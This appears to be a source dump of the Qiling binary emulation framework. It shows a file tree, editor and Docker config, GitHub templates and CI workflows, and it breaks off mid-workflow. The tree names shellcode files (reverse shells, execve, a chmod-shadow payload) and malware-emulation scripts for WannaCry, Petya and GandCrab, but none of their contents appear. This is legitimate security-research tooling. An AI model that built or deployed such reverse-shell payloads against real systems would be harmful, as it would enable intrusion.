├── .dockerignore ├── .editorconfig ├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── PULL_REQUEST_TEMPLATE.md └── workflows │ ├── build-ci.yml │ ├── dockerimage.yml │ ├── giteesync.yml │ └── pythonpublish.yml ├── .gitignore ├── .gitmodules ├── COPYING ├── CREDITS.md ├── ChangeLog ├── Dockerfile ├── README.md ├── TODO ├── docs ├── API.md ├── DEMO.md ├── DLLX86.txt ├── DLLX8664.txt ├── GDBSERVER-IDA.png ├── GDBSERVER.md ├── README.md ├── SETUP.md ├── USAGE.md ├── bg_page.png ├── qiling1_logo_big.png ├── qiling1_logo_small.png ├── qiling2_logo_big.png └── qiling2_logo_small.png ├── examples ├── README.md ├── adcache_x86_windows_debug.py ├── cachedlls_x8664_windows.py ├── crackme_x86_linux.py ├── crackme_x86_windows.py ├── crackme_x86_windows_auto.py ├── crackme_x86_windows_setcallback.py ├── crackme_x86_windows_unpatch.py ├── doogie_8086_crack.py ├── extensions │ ├── idaplugin │ │ └── custom_script.py │ ├── r2 │ │ └── hello_r2.py │ ├── report │ │ └── hello_x86_windows_json.py │ └── trace │ │ └── trace.py ├── fuzzing │ ├── .gitignore │ ├── dlink_dir815 │ │ ├── afl_inputs │ │ │ └── a │ │ ├── dir815_mips32el_linux.py │ │ └── dir815_mips32el_linux.sh │ ├── linux_x8664 │ │ ├── README.md │ │ ├── afl_inputs │ │ │ └── a │ │ ├── fuzz.c │ │ ├── fuzz.sh │ │ ├── fuzz_x8664_linux.py │ │ ├── libfuzzer_x8664_linux.py │ │ ├── qilingfzz.png │ │ ├── qlfuzzer_x8664_linux.py │ │ └── x8664_fuzz │ ├── qnx_arm │ │ ├── README.md │ │ ├── afl_inputs │ │ │ └── a │ │ ├── arm_fuzz │ │ ├── fuzz.c │ │ ├── fuzz.sh │ │ └── fuzz_arm_qnx.py │ ├── rt_n12_b1 │ │ ├── README.md │ │ ├── fuzz.py │ │ ├── http-input │ │ │ ├── 1 │ │ │ ├── 2 │ │ │ ├── 3 │ │ │ └── 4 │ │ └── nvram │ ├── stm32f429 │ │ ├── afl_inputs │ │ │ └── sample │ │ ├── fuzz.py │ │ └── fuzz.sh │ └── tenda_ac15 │ │ ├── README.md │ │ ├── addressNat_overflow.sh │ │ ├── afl_inputs │ │ └── a │ │ ├── fuzz_tendaac15_httpd.py │ │ ├── fuzz_tendaac15_httpd.sh │ │ └── saver_tendaac15_httpd.py ├── hello_8086_dos.py ├── hello_arm_linux_custom_syscall.py ├── hello_arm_linux_debug.py ├── hello_arm_qnx.py ├── hello_arm_qnx_customapi.py ├── hello_arm_set_filter.py ├── hello_arm_uboot.py ├── hello_linuxx8664_intercept.py ├── hello_mips32_linux_customapi.py ├── hello_mips32el_linux_debug.py ├── hello_mips32el_linux_function_hook.py ├── hello_x8664_gdb_macos.py ├── hello_x8664_linux_customapi.py ├── hello_x8664_linux_disasm.py ├── hello_x8664_linux_part_debug.py ├── hello_x8664_linux_part_exec.py ├── hello_x8664_macos.py ├── hello_x8664_windows_customapi.py ├── hello_x86_linux_fake_urandom.py ├── mcu │ ├── gd32vf103_blink.py │ ├── stm32f407_gpio_hook.py │ ├── stm32f407_hack_lock.py │ ├── stm32f407_mnist_oled.py │ ├── stm32f411_dma_logger.py │ ├── stm32f411_freertos.py │ ├── stm32f411_gpio_hook.py │ ├── stm32f411_i2c_lcd.py │ ├── stm32f411_interact_usart.py │ └── stm32f411_spi_oled12864.py ├── mem_invalid_access.py ├── multithreading_arm64_linux.py ├── multithreading_mips32_linux.py ├── multithreading_mips32el_linux.py ├── multithreading_x86_windows.py ├── netgear_6220.py ├── netgear_6220.ql ├── ntQuerySystemInfo_x86.py ├── petya_8086_crack.py ├── regdemo_x86_windows.py ├── sality.py ├── scripts │ ├── dllscollector.bat │ └── dylibcollector.sh ├── setexit_arm64_linux.py ├── shellcode_run.py ├── shellcodes │ ├── bsd64_tcp_bind_shell.hex │ ├── lin32_encoded_execve.hex │ ├── lin32_execve.asm │ ├── lin32_ob_execve.hex │ ├── lin64_execve.hex │ ├── lin64_unknown.hex │ ├── linarm32_tcp_reverse_shell.hex │ ├── linarm64_tcp_reverse_shell.hex │ ├── linarm_chmod_shadow.hex │ ├── linarm_mprotect_egghunter │ ├── linarm_quantum_leap_stub │ ├── linmips32_tcp_reverse_shell.hex │ ├── linmips_execve.hex │ ├── linux_x86_shell_reverse_tcp.asm │ ├── linux_x86_shell_reverse_tcp.bin │ ├── macos64_execve.hex │ ├── macos64_tcp_reverse_shell.hex │ ├── win32_https_download.zip │ ├── win32_ob_exec_calc.asm │ ├── win32_ob_exec_calc.bin │ ├── win32_ob_exec_calc.hex │ ├── win32_ob_msg_box.bin │ ├── win32_ob_shell_reverse_tcp.asm │ ├── win32_ob_shell_reverse_tcp.bin │ ├── win32_shell_reverse_tcp.bin │ ├── win32_urldownload.bin │ ├── win32_wincalc.bin │ ├── win64_ob_msg_box_x64.asm │ ├── win64_ob_msg_box_x64.bin │ └── win64_ob_msg_box_x64.hex ├── simple_efi_x8664.py ├── src │ ├── freebsd │ │ ├── Makefile │ │ ├── README │ │ ├── hello.c │ │ └── x8664_hello_asm.S │ ├── linux │ │ ├── Makefile │ │ ├── README │ │ ├── absolutepath.c │ │ ├── arm_stat.c │ │ ├── armeb_hello │ │ ├── armeb_hello_static │ │ ├── armeb_multithreading │ │ ├── armeb_puts │ │ ├── armeb_tcp_test │ │ ├── armeb_udp_test │ │ ├── cloexec_test.c │ │ ├── cwd.c │ │ ├── fetch_urandom.c │ │ ├── fetch_urandom_multiple_times.c │ │ ├── getdents.c │ │ ├── hello.c │ │ ├── hello.cpp │ │ ├── hello_mips32.s │ │ ├── hello_riscv.s │ │ ├── mem_invalid_access.c │ │ ├── multithreading.c │ │ ├── patch_test.bin.c │ │ ├── patch_test.so.c │ │ ├── patch_test.so.h │ │ ├── path_traverse.c │ │ ├── picohttpd │ │ │ ├── Makefile │ │ │ ├── httpd.c │ │ │ ├── httpd.h │ │ │ ├── main.c │ │ │ ├── picohttpd │ │ │ └── readme.txt │ │ ├── posix_syscall.c │ │ ├── posix_syscall_execve.c │ │ ├── puts.c │ │ ├── sleep_hello.c │ │ ├── tcp_test.c │ │ ├── udp_test.c │ │ └── vshttpd.c │ ├── macos │ │ ├── README │ │ ├── helloworld.c │ │ ├── x8664_hello.asm │ │ └── x86_hello.asm │ ├── qnx │ │ ├── Makefile │ │ ├── README │ │ ├── hello.c │ │ └── hellosqrt.c │ └── windows │ │ ├── MultiThread.c │ │ ├── NtQuerySystemInfo.c │ │ ├── README │ │ ├── argv.c │ │ ├── cmdln.c │ │ ├── file_upx.c │ │ ├── hello.c │ │ └── return_main.c ├── tendaac1518_httpd.py ├── uboot_bin.ql ├── uefi_sanitized_heap.py ├── uselessdisk_x86_windows.py ├── wannacry_x86_windows_hookaddress.py └── windows_trace.py ├── poetry.lock ├── pyproject.toml ├── qiling ├── __init__.py ├── arch │ ├── __init__.py │ ├── arch.py │ ├── arm.py │ ├── arm64.py │ ├── arm64_const.py │ ├── arm_const.py │ ├── arm_utils.py │ ├── cortex_m.py │ ├── cortex_m_const.py │ ├── cpr.py │ ├── cpr64.py │ ├── mips.py │ ├── mips_const.py │ ├── models.py │ ├── msr.py │ ├── ppc.py │ ├── ppc_const.py │ ├── register.py │ ├── riscv.py │ ├── riscv64.py │ ├── riscv_const.py │ ├── utils.py │ ├── x86.py │ ├── x86_const.py │ └── x86_utils.py ├── cc │ ├── __init__.py │ ├── arm.py │ ├── intel.py │ ├── mips.py │ ├── ppc.py │ └── riscv.py ├── const.py ├── core.py ├── core_hooks.py ├── core_hooks_types.py ├── core_struct.py ├── debugger │ ├── __init__.py │ ├── debugger.py │ ├── disassember.py │ ├── gdb │ │ ├── __init__.py │ │ ├── gdb.py │ │ ├── utils.py │ │ ├── xml │ │ │ ├── a8086 │ │ │ │ ├── gdb_init_real_mode.txt │ │ │ │ ├── i386-32bit.xml │ │ │ │ └── target.xml │ │ │ ├── arm │ │ │ │ ├── arm-core.xml │ │ │ │ ├── arm-fpa.xml │ │ │ │ ├── arm-m-profile.xml │ │ │ │ ├── arm-vfpv2.xml │ │ │ │ ├── arm-vfpv3.xml │ │ │ │ ├── target.xml │ │ │ │ └── xscale-iwmmxt.xml │ │ │ ├── arm64 │ │ │ │ ├── aarch64-core.xml │ │ │ │ ├── aarch64-fpu.xml │ │ │ │ └── target.xml │ │ │ ├── mips │ │ │ │ ├── mips-cp0.xml │ │ │ │ ├── mips-cpu.xml │ │ │ │ ├── mips-fpu.xml │ │ │ │ └── target.xml │ │ │ ├── x86 │ │ │ │ ├── 32bit-avx.xml │ │ │ │ ├── 32bit-avx512.xml │ │ │ │ ├── 32bit-core.xml │ │ │ │ ├── 32bit-linux.xml │ │ │ │ ├── 32bit-mpx.xml │ │ │ │ ├── 32bit-pkeys.xml │ │ │ │ ├── 32bit-segments.xml │ │ │ │ ├── 32bit-sse.xml │ │ │ │ └── target.xml │ │ │ └── x8664 │ │ │ │ ├── 64bit-avx.xml │ │ │ │ ├── 64bit-avx512.xml │ │ │ │ ├── 64bit-core.xml │ │ │ │ ├── 64bit-linux.xml │ │ │ │ ├── 64bit-mpx.xml │ │ │ │ ├── 64bit-pkeys.xml │ │ │ │ ├── 64bit-segments.xml │ │ │ │ ├── 64bit-sse.xml │ │ │ │ └── target.xml │ │ └── xmlregs.py │ ├── qdb │ │ ├── README.md │ │ ├── __init__.py │ │ ├── arch │ │ │ ├── __init__.py │ │ │ ├── arch.py │ │ │ ├── arch_arm.py │ │ │ ├── arch_mips.py │ │ │ ├── arch_x86.py │ │ │ └── arch_x8664.py │ │ ├── branch_predictor │ │ │ ├── __init__.py │ │ │ ├── branch_predictor.py │ │ │ ├── branch_predictor_arm.py │ │ │ ├── branch_predictor_mips.py │ │ │ ├── branch_predictor_x86.py │ │ │ └── branch_predictor_x8664.py │ │ ├── const.py │ │ ├── context.py │ │ ├── memory.py │ │ ├── misc.py │ │ ├── qdb.py │ │ ├── render │ │ │ ├── __init__.py │ │ │ ├── render.py │ │ │ ├── render_arm.py │ │ │ ├── render_mips.py │ │ │ ├── render_x86.py │ │ │ └── render_x8664.py │ │ └── utils.py │ └── utils.py ├── exception.py ├── extensions │ ├── __init__.py │ ├── afl │ │ ├── __init__.py │ │ ├── afl.py │ │ └── qlfuzzer.py │ ├── coverage │ │ ├── README.md │ │ ├── __init__.py │ │ ├── formats │ │ │ ├── __init__.py │ │ │ ├── base.py │ │ │ ├── drcov.py │ │ │ ├── drcov_exact.py │ │ │ ├── ezcov.py │ │ │ └── history.py │ │ └── utils.py │ ├── idaplugin │ │ ├── __init__.py │ │ ├── qilingida.py │ │ └── readme.md │ ├── mcu │ │ ├── __init__.py │ │ ├── atmel │ │ │ ├── __init__.py │ │ │ └── sam3x8e.py │ │ ├── bes │ │ │ ├── __init__.py │ │ │ └── bes2300.py │ │ ├── gd32vf1 │ │ │ ├── __init__.py │ │ │ └── gd32vf103.py │ │ ├── nxp │ │ │ ├── __init__.py │ │ │ └── mk64f12.py │ │ ├── stm32f1 │ │ │ ├── __init__.py │ │ │ └── stm32f103.py │ │ └── stm32f4 │ │ │ ├── __init__.py │ │ │ ├── stm32f401.py │ │ │ ├── stm32f405.py │ │ │ ├── stm32f407.py │ │ │ ├── stm32f410.py │ │ │ ├── stm32f411.py │ │ │ ├── stm32f412.py │ │ │ ├── stm32f413.py │ │ │ ├── stm32f415.py │ │ │ ├── stm32f417.py │ │ │ ├── stm32f423.py │ │ │ ├── stm32f427.py │ │ │ ├── stm32f429.py │ │ │ ├── stm32f437.py │ │ │ ├── stm32f439.py │ │ │ ├── stm32f446.py │ │ │ ├── stm32f469.py │ │ │ └── stm32f479.py │ ├── multitask.py │ ├── pipe.py │ ├── r2 │ │ ├── __init__.py │ │ └── r2.py │ ├── report │ │ ├── __init__.py │ │ └── report.py │ ├── sanitizers │ │ ├── __init__.py │ │ └── heap.py │ ├── trace.py │ ├── tracing │ │ ├── README.md │ │ ├── __init__.py │ │ ├── formats │ │ │ ├── __init__.py │ │ │ ├── base.py │ │ │ ├── registers.py │ │ │ └── tenet.py │ │ └── utils.py │ └── winsdkapi.py ├── host.py ├── hw │ ├── __init__.py │ ├── analog │ │ ├── __init__.py │ │ ├── mk64f12_adc.py │ │ ├── sam3xa_adc.py │ │ ├── sam3xa_dac.py │ │ ├── sam3xa_pwm.py │ │ ├── stm32f1xx_adc.py │ │ └── stm32f4xx_dac.py │ ├── char │ │ ├── __init__.py │ │ ├── gd32vf1xx_usart.py │ │ ├── mk64f12_uart.py │ │ ├── sam3xa_uart.py │ │ ├── sam3xa_uotghs.py │ │ ├── stm32f1xx_usart.py │ │ └── stm32f4xx_usart.py │ ├── connectivity.py │ ├── const │ │ ├── __init__.py │ │ ├── cm4_systick.py │ │ ├── gd32vf1xx_dma.py │ │ ├── gd32vf1xx_i2c.py │ │ ├── gd32vf1xx_rcu.py │ │ ├── gd32vf1xx_rtc.py │ │ ├── gd32vf1xx_spi.py │ │ ├── gd32vf1xx_timer.py │ │ ├── gd32vf1xx_usart.py │ │ ├── mk64f12_adc.py │ │ ├── mk64f12_ftm.py │ │ ├── mk64f12_mcg.py │ │ ├── mk64f12_port.py │ │ ├── mk64f12_spi.py │ │ ├── mk64f12_uart.py │ │ ├── sam3xa_adc.py │ │ ├── sam3xa_dac.py │ │ ├── sam3xa_pmc.py │ │ ├── sam3xa_spi.py │ │ ├── sam3xa_uart.py │ │ ├── sam3xa_uotghs.py │ │ ├── stm32f1xx_adc.py │ │ ├── stm32f1xx_dma.py │ │ ├── stm32f4xx_dma.py │ │ ├── stm32f4xx_eth.py │ │ ├── stm32f4xx_i2c.py │ │ ├── stm32f4xx_pwr.py │ │ ├── stm32f4xx_rtc.py │ │ ├── stm32f4xx_sdio.py │ │ ├── stm32f4xx_spi.py │ │ ├── stm32f4xx_tim.py │ │ ├── stm32f4xx_usart.py │ │ └── stm32fxxx_rcc.py │ ├── dma │ │ ├── __init__.py │ │ ├── gd32vf1xx_dma.py │ │ ├── sam3xa_pdc.py │ │ ├── stm32f1xx_dma.py │ │ └── stm32f4xx_dma.py │ ├── external_device │ │ ├── __init__.py │ │ ├── lcd │ │ │ ├── __init__.py │ │ │ ├── const.py │ │ │ └── lcd1602.py │ │ └── oled │ │ │ ├── __init__.py │ │ │ └── ssd1306.py │ ├── flash │ │ ├── __init__.py │ │ ├── sam3xa_efc.py │ │ ├── stm32f1xx_flash.py │ │ └── stm32f4xx_flash.py │ ├── gpio │ │ ├── __init__.py │ │ ├── gd32vf1xx_gpio.py │ │ ├── hooks.py │ │ ├── mk64f12_gpio.py │ │ ├── mk64f12_port.py │ │ ├── sam3xa_pio.py │ │ ├── stm32f1xx_afio.py │ │ ├── stm32f1xx_gpio.py │ │ └── stm32f4xx_gpio.py │ ├── hw.py │ ├── i2c │ │ ├── __init__.py │ │ ├── gd32vf1xx_i2c.py │ │ ├── stm32f1xx_i2c.py │ │ └── stm32f4xx_i2c.py │ ├── intc │ │ ├── __init__.py │ │ ├── cm3_nvic.py │ │ ├── cm4_nvic.py │ │ ├── cm_nvic.py │ │ ├── gd32vf1xx_eclic.py │ │ ├── stm32f1xx_exti.py │ │ └── stm32f4xx_exti.py │ ├── math │ │ ├── __init__.py │ │ ├── gd32vf1xx_crc.py │ │ └── stm32f4xx_crc.py │ ├── mem │ │ ├── __init__.py │ │ ├── cm_bitband.py │ │ ├── kinetis_bme.py │ │ └── remap.py │ ├── misc │ │ ├── __init__.py │ │ ├── cm3_scb.py │ │ ├── cm4_scb.py │ │ ├── cm_scb.py │ │ ├── gd32vf1xx_rcu.py │ │ ├── mk64f12_mcg.py │ │ ├── mk64f12_sim.py │ │ ├── mk64f12_smc.py │ │ ├── mk64f12_wdog.py │ │ ├── sam3xa_wdt.py │ │ ├── stm32f1xx_rcc.py │ │ ├── stm32f4xx_dbg.py │ │ ├── stm32f4xx_rcc.py │ │ ├── stm32f4xx_rcc_derive.py │ │ └── stm32f4xx_syscfg.py │ ├── net │ │ ├── __init__.py │ │ └── stm32f4xx_eth.py │ ├── peripheral.py │ ├── power │ │ ├── __init__.py │ │ ├── sam3xa_pmc.py │ │ └── stm32f4xx_pwr.py │ ├── sd │ │ ├── __init__.py │ │ └── stm32f4xx_sdio.py │ ├── spi │ │ ├── __init__.py │ │ ├── gd32vf1xx_spi.py │ │ ├── mk64f12_spi.py │ │ ├── sam3xa_spi.py │ │ ├── stm32f1xx_spi.py │ │ └── stm32f4xx_spi.py │ ├── timer │ │ ├── __init__.py │ │ ├── cm3_systick.py │ │ ├── cm4_systick.py │ │ ├── cm_systick.py │ │ ├── gd32vf1xx_rtc.py │ │ ├── gd32vf1xx_timer.py │ │ ├── mk64f12_ftm.py │ │ ├── mk64f12_osc.py │ │ ├── mk64f12_rtc.py │ │ ├── sam3xa_tc.py │ │ ├── stm32f1xx_tim.py │ │ ├── stm32f4xx_rtc.py │ │ ├── stm32f4xx_tim.py │ │ └── timer.py │ └── utils │ │ ├── __init__.py │ │ ├── access.py │ │ ├── bcd.py │ │ └── serial.py ├── loader │ ├── __init__.py │ ├── blob.py │ ├── dos.py │ ├── elf.py │ ├── loader.py │ ├── macho.py │ ├── macho_parser │ │ ├── __init__.py │ │ ├── const.py │ │ ├── data.py │ │ ├── header.py │ │ ├── loadcommand.py │ │ ├── parser.py │ │ └── utils.py │ ├── mcu.py │ ├── pe.py │ └── pe_uefi.py ├── log.py ├── os │ ├── __init__.py │ ├── blob │ │ ├── __init__.py │ │ └── blob.py │ ├── const.py │ ├── disk.py │ ├── dos │ │ ├── __init__.py │ │ ├── dos.py │ │ ├── interrupts │ │ │ ├── __init__.py │ │ │ ├── int10.py │ │ │ ├── int13.py │ │ │ ├── int15.py │ │ │ ├── int16.py │ │ │ ├── int19.py │ │ │ ├── int1a.py │ │ │ ├── int20.py │ │ │ └── int21.py │ │ └── utils.py │ ├── fcall.py │ ├── filestruct.py │ ├── freebsd │ │ ├── __init__.py │ │ ├── const.py │ │ ├── freebsd.py │ │ ├── map_syscall.py │ │ └── syscall.py │ ├── linux │ │ ├── __init__.py │ │ ├── fncc.py │ │ ├── function_hook.py │ │ ├── futex.py │ │ ├── kernel_api │ │ │ ├── __init__.py │ │ │ ├── hook.py │ │ │ └── kernel_api.py │ │ ├── linux.py │ │ ├── map_syscall.py │ │ ├── procfs.py │ │ ├── syscall.py │ │ ├── syscall_nums.py │ │ ├── thread.py │ │ └── utils.py │ ├── macos │ │ ├── __init__.py │ │ ├── const.py │ │ ├── events │ │ │ ├── __init__.py │ │ │ ├── macos.py │ │ │ ├── macos_policy.py │ │ │ └── macos_structs.py │ │ ├── fncc.py │ │ ├── kernel_api │ │ │ ├── __init__.py │ │ │ ├── hook.py │ │ │ └── kernel_api.py │ │ ├── kernel_func.py │ │ ├── mach_port.py │ │ ├── macos.py │ │ ├── map_syscall.py │ │ ├── structs.py │ │ ├── subsystems.py │ │ ├── syscall.py │ │ ├── task.py │ │ ├── thread.py │ │ └── utils.py │ ├── mapper.py │ ├── mcu │ │ ├── __init__.py │ │ ├── const.py │ │ └── mcu.py │ ├── memory.py │ ├── os.py │ ├── path.py │ ├── posix │ │ ├── __init__.py │ │ ├── const.py │ │ ├── const_mapping.py │ │ ├── filestruct.py │ │ ├── msq.py │ │ ├── posix.py │ │ ├── shm.py │ │ ├── stat.py │ │ ├── structs.py │ │ └── syscall │ │ │ ├── __init__.py │ │ │ ├── abi │ │ │ ├── __init__.py │ │ │ ├── arm.py │ │ │ ├── intel.py │ │ │ ├── mips.py │ │ │ ├── ppc.py │ │ │ └── riscv.py │ │ │ ├── fcntl.py │ │ │ ├── futex.py │ │ │ ├── ioctl.py │ │ │ ├── mman.py │ │ │ ├── msg.py │ │ │ ├── net.py │ │ │ ├── personality.py │ │ │ ├── poll.py │ │ │ ├── prctl.py │ │ │ ├── ptrace.py │ │ │ ├── random.py │ │ │ ├── resource.py │ │ │ ├── sched.py │ │ │ ├── select.py │ │ │ ├── sendfile.py │ │ │ ├── shm.py │ │ │ ├── signal.py │ │ │ ├── socket.py │ │ │ ├── stat.py │ │ │ ├── syscall.py │ │ │ ├── sysctl.py │ │ │ ├── sysinfo.py │ │ │ ├── time.py │ │ │ ├── types.py │ │ │ ├── uio.py │ │ │ ├── unistd.py │ │ │ ├── utsname.py │ │ │ └── wait.py │ ├── qnx │ │ ├── __init__.py │ │ ├── const.py │ │ ├── helpers.py │ │ ├── map_msgtype.py │ │ ├── map_syscall.py │ │ ├── message.py │ │ ├── qnx.py │ │ ├── structs.py │ │ ├── syscall.py │ │ └── types.py │ ├── stats.py │ ├── struct.py │ ├── thread.py │ ├── uefi │ │ ├── PiMultiPhase.py │ │ ├── ProcessorBind.py │ │ ├── UefiBaseType.py │ │ ├── UefiMultiPhase.py │ │ ├── UefiSpec.py │ │ ├── __init__.py │ │ ├── bs.py │ │ ├── const.py │ │ ├── context.py │ │ ├── ds.py │ │ ├── fncc.py │ │ ├── guids.csv │ │ ├── hob.py │ │ ├── protocols │ │ │ ├── EfiLoadedImageProtocol.py │ │ │ ├── EfiSmmAccess2Protocol.py │ │ │ ├── EfiSmmBase2Protocol.py │ │ │ ├── EfiSmmCpuProtocol.py │ │ │ ├── EfiSmmSwDispatch2Protocol.py │ │ │ ├── PcdProtocol.py │ │ │ ├── __init__.py │ │ │ └── common.py │ │ ├── rt.py │ │ ├── smm.py │ │ ├── smst.py │ │ ├── st.py │ │ ├── type32.py │ │ ├── type64.py │ │ ├── uefi.py │ │ └── utils.py │ ├── utils.py │ └── windows │ │ ├── __init__.py │ │ ├── api.py │ │ ├── clipboard.py │ │ ├── const.py │ │ ├── dlls │ │ ├── __init__.py │ │ ├── advapi32.py │ │ ├── const.py │ │ ├── crypt32.py │ │ ├── kernel32 │ │ │ ├── __init__.py │ │ │ ├── consoleapi.py │ │ │ ├── consoleapi2.py │ │ │ ├── consoleapi3.py │ │ │ ├── debugapi.py │ │ │ ├── errhandlingapi.py │ │ │ ├── fibersapi.py │ │ │ ├── fileapi.py │ │ │ ├── handleapi.py │ │ │ ├── heapapi.py │ │ │ ├── interlockedapi.py │ │ │ ├── ioapiset.py │ │ │ ├── libloaderapi.py │ │ │ ├── memoryapi.py │ │ │ ├── processenv.py │ │ │ ├── processthreadsapi.py │ │ │ ├── profileapi.py │ │ │ ├── psapi.py │ │ │ ├── stringapiset.py │ │ │ ├── synchapi.py │ │ │ ├── sysinfoapi.py │ │ │ ├── timezoneapi.py │ │ │ ├── tlhelp32.py │ │ │ ├── winbase.py │ │ │ ├── winnls.py │ │ │ ├── winnt.py │ │ │ └── wow64apiset.py │ │ ├── mscoree.py │ │ ├── msi.py │ │ ├── msvbvm60.py │ │ ├── msvcrt.py │ │ ├── ntdll.py │ │ ├── ntoskrnl.py │ │ ├── ole32.py │ │ ├── oleaut32.py │ │ ├── shell32.py │ │ ├── shlwapi.py │ │ ├── ucrtbased.py │ │ ├── user32.py │ │ ├── wininet.py │ │ ├── wsock32.py │ │ └── wudplatform.py │ │ ├── fiber.py │ │ ├── fncc.py │ │ ├── handle.py │ │ ├── registry.py │ │ ├── structs.py │ │ ├── thread.py │ │ ├── utils.py │ │ ├── wdk_const.py │ │ └── windows.py ├── profiles │ ├── dos.ql │ ├── freebsd.ql │ ├── linux.ql │ ├── macos.ql │ ├── qnx.ql │ ├── uefi.ql │ └── windows.ql └── utils.py ├── qltool ├── qltui.py └── tests ├── README ├── profiles ├── uboot_bin.ql ├── windows_gandcrab_admin.ql ├── windows_gandcrab_russian_keyboard.ql └── windows_gandcrab_user.ql ├── qdb_scripts ├── arm.qdb ├── mips32el.qdb └── x86.qdb ├── test_android.py ├── test_blob.py ├── test_cpu_models.py ├── test_debugger.py ├── test_dos.py ├── test_dos_exe.py ├── test_edl.py ├── test_elf.py ├── test_elf_ko.py ├── test_elf_multithread.py ├── test_history.py ├── test_macho.py ├── test_macho.sh ├── test_macho_kext.py ├── test_mcu.py ├── test_onlinux.sh ├── test_pathutils.py ├── test_pe.bat ├── test_pe.py ├── test_pe_sys.py ├── test_perf.py ├── test_peshellcode.py ├── test_posix.py ├── test_qdb.py ├── test_qltool.py ├── test_qnx.py ├── test_r2.py ├── test_riscv.py ├── test_shellcode.py ├── test_struct.py ├── test_tendaac15_httpd.py ├── test_uefi.py ├── test_windows_debugger.py ├── test_windows_stdio.py └── view_perf_results.py /.dockerignore: -------------------------------------------------------------------------------- 1 | /** 2 | !/qiling/ 3 | !/poetry.lock 4 | !/pyproject.toml 5 | !/ql* 6 | !/README.md 7 | -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | # EditorConfig is awesome: https://editorconfig.org 2 | 3 | # top-most EditorConfig file 4 | root = true 5 | 6 | [*.py] 7 | charset = utf-8 8 | end_of_line = lf 9 | indent_size = 4 10 | indent_style = space 11 | insert_final_newline = true 12 | trim_trailing_whitespace = true 13 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Make sure to star Qiling(top right conner), switch to "dev" branch and check FAQ at https://docs.qiling.io 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | --- 8 | 9 | ***Describe the bug** 10 | A clear and concise description of what the bug is. 11 | 12 | **Sample Code** 13 | ```python 14 | ql = Qiling(["x8664_freebsd/bin/x8664_hello_asm"], "x8664_freebsd", output = "dump") 15 | ql.run() 16 | ``` 17 | 18 | **Expected behavior** 19 | A clear and concise description of what you expected to happen. 20 | 21 | **Screenshots** 22 | If applicable, add screenshots to help explain your problem. 23 | 24 | **Additional context** 25 | Add any other context about the problem here. 26 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: This is a open source project, pull request is always better than raising an issue 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | Send us a pull request always help, or any pseudo code might be useful. -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | 5 | 6 | ## Checklist 7 | 8 | ### Which kind of PR do you create? 9 | 10 | - [ ] This PR only contains minor fixes. 11 | - [ ] This PR contains major feature update. 12 | - [ ] This PR introduces a new function/api for Qiling Framework. 13 | 14 | ### Coding convention? 15 | 16 | - [ ] The new code conforms to Qiling Framework naming convention. 17 | - [ ] The imports are arranged properly. 18 | - [ ] Essential comments are added. 19 | - [ ] The reference of the new code is pointed out. 20 | 21 | ### Extra tests? 22 | 23 | - [ ] No extra tests are needed for this PR. 24 | - [ ] I have added enough tests for this PR. 25 | - [ ] Tests will be added after some discussion and review. 26 | 27 | ### Changelog? 28 | 29 | - [ ] This PR doesn't need to update Changelog. 30 | - [ ] Changelog will be updated after some proper review. 31 | - [ ] Changelog has been updated in my PR. 32 | 33 | ### Target branch? 34 | 35 | - [ ] The target branch is dev branch. 36 | 37 | ### One last thing 38 | 39 | - [ ] I have read the [contribution guide](https://docs.qiling.io/en/latest/contribution/) 40 | 41 | ----- 42 | -------------------------------------------------------------------------------- /.github/workflows/dockerimage.yml: -------------------------------------------------------------------------------- 1 | name: Docker Image CI 2 | 3 | on: 4 | release: 5 | types: [published] 6 | push: 7 | branches: [dev] 8 | 9 | jobs: 10 | build: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - name: "Checkout git repo" 14 | uses: actions/checkout@v1 15 | 16 | - name: Publish to registry 17 | uses: docker/build-push-action@v1.1.0 18 | with: 19 | username: ${{ secrets.DOCKER_USERNAME }} 20 | password: ${{ secrets.DOCKER_PASSWORD }} 21 | repository: qilingframework/qiling 22 | tag_with_ref: true 23 | tags: latest 24 | -------------------------------------------------------------------------------- /.github/workflows/giteesync.yml: -------------------------------------------------------------------------------- 1 | name: sync to gitee 2 | on: 3 | push: 4 | 5 | jobs: 6 | deploy: 7 | runs-on: ubuntu-latest 8 | if: github.repository_owner == 'qilingframework' 9 | steps: 10 | - uses: actions/checkout@v2 11 | with: 12 | fetch-depth: 0 13 | - uses: xwings/sync-repo-action@master 14 | with: 15 | run: git config --global --add safe.directory * 16 | ssh_private_key: ${{ secrets.GITEE_KEY }} 17 | target_repo: ssh://git@gitee.com/qilingframework/qiling.git 18 | -------------------------------------------------------------------------------- /.github/workflows/pythonpublish.yml: -------------------------------------------------------------------------------- 1 | name: PyPI 📦 Distribution 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v2 10 | - name: Set up Python 11 | uses: actions/setup-python@v4 12 | with: 13 | python-version: "^3.8" 14 | - name: Install dependencies 15 | run: pipx install poetry 16 | - name: Build distribution 📦 17 | run: poetry build -n 18 | - uses: actions/upload-artifact@v4 19 | with: 20 | path: ${{ github.workspace }}/dist/* 21 | 22 | publish: 23 | needs: [build] 24 | runs-on: ubuntu-latest 25 | if: startsWith(github.ref, 'refs/tags') 26 | steps: 27 | - uses: actions/download-artifact@v4 28 | with: 29 | name: artifact 30 | path: dist 31 | 32 | - name: Publish distribution 📦 to test PyPI 33 | uses: pypa/gh-action-pypi-publish@master 34 | with: 35 | user: __token__ 36 | password: ${{ secrets.testpypi_pass }} 37 | repository_url: https://test.pypi.org/legacy/ 38 | 39 | - name: Publish distribution 📦 to PyPI 40 | if: ${{ success() }} 41 | uses: pypa/gh-action-pypi-publish@master 42 | with: 43 | user: __token__ 44 | password: ${{ 